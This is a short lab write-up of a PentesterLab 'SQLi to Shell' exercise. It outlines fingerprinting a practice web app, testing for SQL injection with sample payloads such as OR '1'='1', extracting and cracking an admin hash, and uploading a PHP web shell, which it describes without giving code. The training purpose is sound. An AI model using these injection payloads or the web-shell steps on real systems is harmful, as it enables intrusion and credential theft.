SQLi to Shell - Pentester Lab Exercise

Mark Koskei

November 09, 2015

The exercise requires us to leverage SQL injection (SQLi) to gain shell access on a vulnerable web application.

A live image for a Unix-like operating system was provided and accessing the device through a browser gives us a simple website.

Fingerprinting

Fingerprinting refers to the gathering information from the target system.

Examining the URLs in the web browser or alternatively inspecting the received HTTP headers reveals that the website was written in PHP.

On further investigation, a HTTP GET request returns the version of PHP running, the web server and the version of operating system.

OpenSSL returns nothing indicating that the application is not available over HTTPS.

Detecting SQL Injection

From the target website, we can see a pattern of how pages are returned as shown in the snippet below.

/cat.php?id=n

The value n refers to an integer value which returns a different page depending on the user input.

A simple test for SQLi could then involve inserting the sample statement into the URL field:

SELECT * FROM articles WHERE id=2-1;

If the given query returns article 1, this implies that the application is running calculations on the database. This is referred to as detection based on integers.

Alternatively, we can test for SQLi based on strings. This relies on the fact that SQL strings are put in between quotes and a single quote will break a query.

A test for this type of vulnerability can be done by inserting a simple query where SQL would expect a variable.

As an example the statement below would return all values from the table. This is because the statement “1=1” returns the value “True”.

SELECT * FROM users WHERE name = '' OR '1'='1';

Exploitation

Based on the results of the detection stage, we can prove an SQL injection exists in our web application.

Therefore our objective becomes the retrieval of additional information from within the database. To achieve this the SQL operation, UNION can be leveraged to return information stored in other tables.

The result of this section of the exercise is a username and hashed password for a privileged (administrator) account on the web application.

Information gathered in the fingerprinting stage reveals that the query language used is MySQL which means the use of MD5 or SHA1 hashing function for the password.

Using this information, we can crack the hash using John the Ripper. Alternatively, an online search should return quick (and online) password hashing tools or dumps with matching cleartext and hash values.

Our returned username and password should allow us enhanced access to the web application.

From the fingerprinting stage, we know that the web server is running Squeeze; a version of the Debian distro.

Using this information, the objective becomes attempting to upload a php script through which we can access the Bash shell. With a successful upload of the script, we are able to run Bash commands through the URL and thus completing the exercise.

Conclusion

The exercise above is provided by Pentester Lab and can be attempted here.